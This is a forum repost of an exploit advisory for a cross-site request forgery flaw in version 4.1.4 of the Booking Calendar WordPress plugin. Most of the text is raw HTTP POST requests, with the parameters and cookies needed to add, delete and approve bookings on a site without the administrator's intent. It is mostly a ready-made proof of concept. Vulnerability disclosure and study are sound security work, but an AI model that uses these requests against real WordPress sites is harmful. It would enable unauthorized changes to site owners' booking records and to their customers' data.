Matt Posted August 6, 2013 Report Posted August 6, 2013 Description : Book Calendar WordPress plugin version 4.1.4 suffers from a cross site request forgery vulnerability.Author : Dylan IrziSource : Booking Calendar 4.1.4 Cross Site Request Forgery ? Packet StormCode : ############################################################################################ Exploit Title: CSRF Plugin Booking Calendar 4.1.4 – WordPress# Date: 04 de Agosto del 2013# Exploit Author: Dylan Irzi# Credit goes for: websecuritydev.com# Vendor Homepage: http://wpbookingcalendar.com/# Tested on: Win8 & Linux Mint# Affected Version : 4.1.4## Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}# Greetz: all team WebSecuritydev.###########################################################################################CSRF VIA POST.Añadir nuevo.http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.phpPOST:Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101Firefox/22.0 AlexaToolbar/alxf-2.18Accept: */*Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer:http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservationContent-Length: 311Connection: keep-alivePragma: no-cacheCache-Control: no-cache-----------------------------------------------------------ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi%40gmail.com~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES------------------------------------------------------------------------------------------------------------------Delete:Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.phpPost:Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101Firefox/22.0 AlexaToolbar/alxf-2.18Accept: */*Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer:http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actionsContent-Length: 104Connection: keep-alivePragma: no-cacheCache-Control: no-cache---------------------------ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES------------------------------------------------------------------------------------------------------------------<< Aprobar Evento >>URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.phpPOST:Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101Firefox/22.0 AlexaToolbar/alxf-2.18Accept: */*Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer:http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actionsContent-Length: 128Cookie:wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271;wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b;PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0Connection: keep-alivePragma: no-cacheCache-Control: no-cache---------------------------------------------------------ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES-------------------------------------------------------------------------------------------------------------------- *By Dylan Irzi@Dylan_Irzi11Pentest de Seguridad.WhiteHat.* Quote
